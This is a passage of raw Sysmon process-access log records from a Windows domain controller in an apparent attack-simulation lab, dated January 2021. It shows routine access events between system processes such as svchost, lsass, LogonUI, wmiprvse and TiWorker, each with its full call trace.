32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.602{59A5CD1D-8E46-6005-0F00-00000000A301}11161256C:\Windows\System32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.368{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.368{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\R
PCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000009907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT